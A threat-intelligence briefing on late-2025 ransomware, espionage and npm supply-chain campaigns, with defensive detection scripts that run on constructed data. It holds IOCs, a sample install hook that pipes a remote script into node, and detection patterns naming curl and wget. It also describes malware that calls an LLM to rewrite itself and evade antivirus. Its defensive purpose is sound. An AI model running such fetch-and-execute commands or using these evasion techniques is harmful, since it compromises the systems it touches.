Ongoing campaigns from established actors have escalated: they are targeting critical public safety infrastructure and major retail brands, and leveraging AI for evasion.
Below is a detailed technical breakdown of the most significant active threats reported in the last 72 hours, as I track the events and technical details for you.
🚨 INC Ransomware: Crippling Public Safety
Target: OnSolve CodeRED (Emergency Notification System)
Date: Early November 2025
Attribution: INC Ransomware Gang (RaaS)
The INC Ransom gang successfully compromised the legacy environment of the OnSolve CodeRED platform, a critical tool used by US public safety agencies for emergency alerts (weather, evacuation, missing persons). The attack forced a complete decommission of the legacy environment.
Tactics, Techniques, & Procedures (TTPs)
- Initial Access: INC Ransom is known to exploit public-facing vulnerabilities (such as Citrix NetScaler CVE-2023-3519) or to use valid credentials obtained via spear-phishing.
- Lateral Movement: The group relies heavily on Living-off-the-Land (LotL) techniques to blend in with routine administration.
  - Tools: wmic.exe and PsExec (often renamed to disguise activity, e.g., winupd.exe).
- Persistence: Deployment of remote management tools to maintain access.
- Extortion: A “Double Extortion” model is used: they encrypt data and threaten to leak exfiltrated PII. In this case, 1.15 TB of data (names, addresses, phone numbers) was stolen.
Indicators of Compromise (IOCs)
- Targeted Assets: Legacy CodeRED infrastructure.
- Malware Behavior: Termination of database processes (SQL, Oracle) prior to encryption to ensure file locking.
- Ransom Note: Files renamed with the .inc extension (or similar variants).
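The two INC Ransom behaviours above that do not depend on a file hash, a renamed PsExec/wmic copy and database processes killed ahead of encryption, can be caught from process-creation telemetry. The detector below is an added example, not code from the report: it runs over constructed Sysmon-style Event ID 1 records (fields Image, OriginalFileName, CommandLine). It assumes PsExec's PE OriginalFileName reads "psexec.c" and the service half "psexesvc.exe"; verify that against your own copies before deploying the rule.

```python
"""
Added example (not from the original report): flag renamed LotL tools and
database-process kills in constructed Sysmon-style process-creation events.
"""
import ntpath

# PE OriginalFileName -> on-disk names that are legitimate for that tool.
# Any other on-disk name under that OriginalFileName is a renamed copy.
LOTL_TOOLS = {
    "psexec.c": {"psexec.exe", "psexec64.exe"},   # assumed OriginalFileName of PsExec
    "psexesvc.exe": {"psexesvc.exe"},             # assumed name of the PsExec service
    "wmic.exe": {"wmic.exe"},
}

# Database images whose termination before encryption is a ransomware
# precursor (SQL Server and Oracle, per the report).
DB_PROCESS_NAMES = {"sqlservr.exe", "oracle.exe", "tnslsnr.exe"}


def is_renamed_lotl_tool(event):
    """True when the PE header says PsExec/wmic but the on-disk name differs."""
    original = (event.get("OriginalFileName") or "").lower()
    on_disk = ntpath.basename(event.get("Image", "")).lower()
    return original in LOTL_TOOLS and on_disk not in LOTL_TOOLS[original]


def kills_db_process(event):
    """True when taskkill is pointed at one of the database images."""
    image = ntpath.basename(event.get("Image", "")).lower()
    cmd = event.get("CommandLine", "").lower()
    return image == "taskkill.exe" and any(p in cmd for p in DB_PROCESS_NAMES)


def triage(events):
    """Return [(rule, image, command_line)] for every event that trips a rule."""
    findings = []
    for ev in events:
        if is_renamed_lotl_tool(ev):
            findings.append(("renamed_lotl_tool", ev["Image"], ev.get("CommandLine", "")))
        if kills_db_process(ev):
            findings.append(("db_process_kill", ev["Image"], ev.get("CommandLine", "")))
    return findings


# Constructed sample telemetry (not from any real host).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe", "OriginalFileName": "wmic.exe",
     "CommandLine": "wmic os get caption"},                          # legitimate wmic
    {"Image": r"C:\Tools\PsExec.exe", "OriginalFileName": "psexec.c",
     "CommandLine": r"PsExec.exe \\APP01 ipconfig"},                 # legitimate PsExec
    {"Image": r"C:\ProgramData\winupd.exe", "OriginalFileName": "psexec.c",
     "CommandLine": r"winupd.exe \\FS01 cmd.exe"},                   # renamed PsExec
    {"Image": r"C:\Windows\System32\taskkill.exe", "OriginalFileName": "taskkill.exe",
     "CommandLine": "taskkill /F /IM sqlservr.exe"},                  # DB process kill
    {"Image": r"C:\Windows\System32\taskkill.exe", "OriginalFileName": "taskkill.exe",
     "CommandLine": "taskkill /F /IM notepad.exe"},                   # benign
]

if __name__ == "__main__":
    for rule, image, cmd in triage(SAMPLE_EVENTS):
        print(f"[{rule}] {image} :: {cmd}")
```

Keying on OriginalFileName rather than the image path is the point: the attacker controls the file name but not the PE header of the real tool, so the disguise is itself the signal. The DB-kill rule is deliberately narrow (taskkill only); in production you would also cover `net stop` of the corresponding services.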
👟 Everest Ransomware: The Under Armour Breach
Target: Under Armour (Sportswear)
Date: November 18, 2025
Attribution: Everest Ransomware Group
The Everest group listed Under Armour on their data leak site, claiming to have exfiltrated 343 GB of sensitive internal data. This group typically acts as an Initial Access Broker (IAB) but conducts its own extortion campaigns.
Tactics, Techniques, & Procedures (TTPs)
- Initial Access: Often accomplished via compromised remote access credentials (RDP/VPN) or exploited unpatched web servers.
- Exfiltration: Data is compressed and exfiltrated before any encryption attempts.
- Communication: The group demands communication via Tox Messenger within a strict deadline (7 days) to prevent data publication.
- Payment: Uniquely prefers Monero (XMR) to maximize anonymity, unlike many groups still accepting Bitcoin.
Indicators of Compromise (IOCs)
- Data Staging: Presence of large encrypted archives (7z/rar) in root directories.
- Network: Traffic to known file-sharing sites (MEGA, SendSpace) used for exfiltration.
🐺 Bloody Wolf: Targeting Central Asia
Target: Government & Finance Sectors (Kyrgyzstan, Uzbekistan)
Date: Late November 2025 (Active since June 2025)
Attribution: “Bloody Wolf” Threat Actor
Security researchers at Group-IB identified this actor running a sustained campaign impersonating the Ministry of Justice in Kyrgyzstan and Uzbekistan.
Tactics, Techniques, & Procedures (TTPs)
- Delivery: Spear-phishing emails containing PDFs disguised as official documents.
- Execution Chain:
  - The user clicks a link in the PDF.
  - A malicious Java Archive (JAR) file is downloaded.
  - The JAR acts as a downloader for the final payload.
- Payload: NetSupport RAT (specifically an older 2013 version). This legitimate remote admin tool is weaponized to grant attackers full control while bypassing some AV detection.
- Geofencing: The attack infrastructure checks the victim’s IP. If it is outside the target country (e.g., Uzbekistan), the user is redirected to a legitimate government site (data.egov.uz) to hide malicious intent.
Indicators of Compromise (IOCs)
- File Type: Malicious .jar files in the user’s Downloads folder.
- Network: HTTP traffic fetching NetSupport binaries from non-official domains.
- Persistence: Registry keys added to HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
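The Run-key persistence and the JAR-in-Downloads pattern above can be checked offline from a `reg export` of the user hive. The script below is an added example, not part of the Group-IB report: it parses a constructed .reg dump of the HKCU Run key and flags autostart entries that launch a .jar through Java, run anything out of the Downloads folder, or point at a NetSupport-style client. The registry content is constructed, and the "netsupport"/"client32" name match is an assumption about how the dropped RAT is labelled, not a confirmed IOC.

```python
"""
Added example (not from the original report): audit an exported HKCU Run key
for autostart entries consistent with the Bloody Wolf chain.
"""
import re

RUN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"

# One "Name"="value" line inside a .reg file (values are REG_SZ here).
_ENTRY_RE = re.compile(r'^"(?P<name>[^"]+)"="(?P<value>.*)"$')


def parse_reg_export(text):
    """Return {value_name: command} for entries under the HKCU Run key only."""
    entries, in_run_key = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            # A new key header; only the Run key itself is of interest.
            in_run_key = line[1:-1].lower() == RUN_KEY.lower()
            continue
        m = _ENTRY_RE.match(line)
        if in_run_key and m:
            # .reg files escape backslashes as \\ and quotes as \" .
            entries[m["name"]] = m["value"].replace("\\\\", "\\").replace('\\"', '"')
    return entries


def classify(command):
    """Return the rule names a Run-key command trips (empty list if clean)."""
    cmd = command.lower()
    hits = []
    if re.search(r"\bjavaw?(\.exe)?\b.*\.jar\b", cmd) or cmd.endswith(".jar"):
        hits.append("java_jar_autostart")
    if "\\downloads\\" in cmd:
        hits.append("runs_from_downloads")
    if "netsupport" in cmd or "client32" in cmd:   # assumed naming of the RAT client
        hits.append("netsupport_client")
    return hits


def audit(text):
    """Return {value_name: [rules]} for every flagged entry in the export."""
    return {name: hits for name, cmd in parse_reg_export(text).items()
            if (hits := classify(cmd))}


# Constructed .reg export (not taken from any real host).
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\bob\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"MinJust_Update"="\"C:\\Program Files\\Java\\jre\\bin\\javaw.exe\" -jar \"C:\\Users\\bob\\Downloads\\Decree_2025.jar\""
"RemoteSvc"="C:\\Users\\bob\\AppData\\Roaming\\NetSupport\\client32.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Installer"="C:\\Users\\bob\\Downloads\\setup.exe"
'''

if __name__ == "__main__":
    for name, rules in audit(SAMPLE_REG_EXPORT).items():
        print(f"{name}: {', '.join(rules)}")
```

Running the same check over RunOnce and the HKLM Run keys is a one-line change to `RUN_KEY`; the parser is kept to a single key so the example stays readable.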
🇰🇵 North Korean Supply Chain: “Contagious Interview”
Target: Developers / Crypto Sector
Date: Late November 2025
Attribution: North Korean State-Sponsored Actors (Lazarus Cluster)
This ongoing campaign involves flooding the npm open-source registry with malicious packages. 197 new packages were recently identified.
Tactics, Techniques, & Procedures (TTPs)
- Vector: Typosquatting and social engineering. Attackers pose as recruiters inviting developers to coding interviews, tricking them into downloading malicious npm packages (e.g., node-nvm-ssh).
- Malware: OtterCookie, a sophisticated RAT/loader.
- Behavior:
  - Profiles the victim’s machine (OS, user privileges).
  - Connects to C2 to fetch secondary payloads (often BeaverTail or InvisibleFerret).
  - Specifically targets cryptocurrency wallet data and browser extensions (MetaMask).
Indicators of Compromise (IOCs)
- C2 Domain: tetrismic.vercel[.]app (hardcoded Vercel app used for fetching commands).
- Files: Presence of hidden directories or files matching wallet names (.wallet, metamask) being staged for upload.
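Because the campaign above reaches developers through packages they are told to install, the cheapest control is an audit of package.json before `npm install` runs. The script below is an added example, not code from the report or from npm: it flags dependencies on a blocklist seeded with the one package name the report gives (node-nvm-ssh), names within edit distance 2 of well-known packages (typosquatting), and install-time lifecycle scripts that pull or evaluate remote code. The popular-package list, the regex, and the sample package.json are constructed for illustration.

```python
"""
Added example (not from the original report): offline audit of a package.json
for blocklisted, typosquatted, or install-hook-abusing npm dependencies.
"""
import json
import re

# Seeded with the package name from the report; extend from your own intel feed.
BLOCKLIST = {"node-nvm-ssh"}

# Constructed allowlist of well-known package names used as typosquat targets.
POPULAR = {"express", "lodash", "axios", "react", "chalk", "commander", "dotenv"}

# Lifecycle hooks npm runs automatically during install.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")
# Assumed heuristic: anything in a hook that fetches or evaluates remote code.
REMOTE_FETCH_RE = re.compile(r"(curl|wget|https?://|child_process|eval\()", re.I)


def levenshtein(a, b):
    """Classic edit distance via dynamic programming, O(len(a) * len(b))."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_target(name):
    """Return the popular package this name imitates, or None if it is exact or far."""
    if name in POPULAR:
        return None
    for pop in POPULAR:
        if levenshtein(name, pop) <= 2:
            return pop
    return None


def audit_package_json(text):
    """Return [(rule, detail)] findings for a package.json document."""
    pkg = json.loads(text)
    findings = []
    deps = {}
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        deps.update(pkg.get(section, {}))
    for name in deps:
        if name in BLOCKLIST:
            findings.append(("blocklisted_dependency", name))
        target = typosquat_target(name)
        if target:
            findings.append(("possible_typosquat", f"{name} ~ {target}"))
    scripts = pkg.get("scripts", {})
    for hook in INSTALL_HOOKS:
        if hook in scripts and REMOTE_FETCH_RE.search(scripts[hook]):
            findings.append(("install_hook_fetches_code", f"{hook}: {scripts[hook]}"))
    return findings


# Constructed package.json resembling a "take-home interview" project.
SAMPLE_PACKAGE_JSON = """{
  "name": "interview-task",
  "version": "1.0.0",
  "scripts": {
    "test": "jest",
    "postinstall": "curl -s https://placeholder.invalid/init.js | node"
  },
  "dependencies": {
    "express": "^4.19.0",
    "lodahs": "1.0.2",
    "node-nvm-ssh": "0.0.3",
    "axios": "^1.7.0"
  }
}"""

if __name__ == "__main__":
    for rule, detail in audit_package_json(SAMPLE_PACKAGE_JSON):
        print(f"[{rule}] {detail}")
```

The install-hook rule matters most: a malicious package does not need to be imported to run, since npm executes `postinstall` for every package in the tree. Pairing this audit with `npm install --ignore-scripts` in CI removes that execution path entirely.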
🤖 AI-Powered Malware: PROMPTFLUX & PROMPTLOCK
Date: November 2025
Discovery: Google Threat Intelligence Group (GTIG)
These samples mark a significant shift in malware development capabilities: they call Large Language Models (LLMs) at runtime for dynamic evasion.
PROMPTFLUX
- Type: VBScript-based backdoor.
- AI Integration: Features a “Thinking Robot” module. It sends the malware’s own code to the Gemini API (using a stolen/hardcoded API key) and asks the AI to obfuscate or rewrite the code to evade antivirus signatures.
- Persistence: The newly rewritten code is saved and executed, changing the file hash constantly.
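A file whose hash changes on every rewrite defeats signature matching, so the useful telemetry is the rewriting itself. The detector below is an added example, not from GTIG's report: it consumes a constructed feed of file-write events (ISO timestamp, path, SHA-256, tab-separated) and flags any path whose content hash changes at least a threshold number of times inside a sliding window, which is the behaviour the PROMPTFLUX "Thinking Robot" module produces. The event format, thresholds, and digests are assumptions for the example.

```python
"""
Added example (not from the original report): hash-independent detection of a
script that keeps rewriting itself, based on per-path hash churn over time.
"""
from collections import defaultdict
from datetime import datetime, timedelta


def parse_event(line):
    """'ISO-timestamp<TAB>path<TAB>sha256' -> (datetime, path, sha256)."""
    ts, path, digest = line.rstrip("\n").split("\t")
    return datetime.fromisoformat(ts), path, digest


def hash_churn(lines, window=timedelta(hours=24), min_changes=3):
    """Return {path: distinct_hash_count} for every path whose content hash
    changed at least min_changes times within any window-sized span."""
    per_path = defaultdict(list)
    for line in lines:
        if not line.strip():
            continue
        ts, path, digest = parse_event(line)
        per_path[path.lower()].append((ts, digest))   # Windows paths: case-fold

    flagged = {}
    for path, writes in per_path.items():
        writes.sort()
        # Timestamps at which the hash differed from the previous write.
        change_times = [t for (t, d), (_, prev) in zip(writes[1:], writes) if d != prev]
        start = 0
        for end in range(len(change_times)):
            # Slide the window start forward until it fits inside `window`.
            while change_times[end] - change_times[start] > window:
                start += 1
            if end - start + 1 >= min_changes:
                flagged[path] = len({d for _, d in writes})
                break
    return flagged


# Constructed write log (digests truncated placeholders, not real hashes).
SAMPLE_LOG = """\
2025-11-20T08:00:00\tC:\\Users\\bob\\AppData\\Roaming\\updater.vbs\taaaa0001
2025-11-20T09:00:00\tC:\\Users\\bob\\AppData\\Roaming\\updater.vbs\taaaa0002
2025-11-20T10:00:00\tC:\\Users\\bob\\AppData\\Roaming\\updater.vbs\taaaa0003
2025-11-20T11:00:00\tC:\\Users\\bob\\AppData\\Roaming\\updater.vbs\taaaa0004
2025-11-20T08:30:00\tC:\\Users\\bob\\Documents\\report.docx\tbbbb0001
2025-11-20T17:45:00\tC:\\Users\\bob\\Documents\\report.docx\tbbbb0002
2025-11-20T12:00:00\tC:\\Windows\\Temp\\log.txt\tcccc0001
2025-11-20T13:00:00\tC:\\Windows\\Temp\\log.txt\tcccc0001
""".splitlines()

if __name__ == "__main__":
    for path, n in hash_churn(SAMPLE_LOG).items():
        print(f"{path}: {n} distinct hashes")
```

The document being edited twice in a day and the log file rewritten with identical content stay silent; only the script that has four distinct hashes in three hours is reported. Tune `min_changes` against build directories and other legitimately volatile paths before alerting on it.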
PROMPTLOCK
- Type: Ransomware (Lua-based).
- Target: Cross-platform (Windows, Linux, macOS).
- AI Integration: Uses LLMs to generate malicious scripts on-the-fly for specific encryption tasks or environment checks.
📅 Significant Groups (Previous Quarter Spotlight)
Bert Ransomware (Water Pombero)
- First Sighting: April 2025.
- Targets: Healthcare/Tech in Asia & Europe.
- Key TTP: Uses a PowerShell loader (start.ps1) to disable Windows Defender and UAC before fetching the payload from 185.100.157[.]74.
- Encryption: The Windows variant uses standard AES; the Linux variant uses 50 threads for rapid encryption.
RansomHub
- Status: The dominant successor to ALPHV/BlackCat.
- Model: Highly aggressive affiliate program with a 90/10 split favoring affiliates.
- Key TTP: Exploits Zerologon (CVE-2020-1472) for privilege escalation and recruits former ALPHV affiliates to scale operations quickly.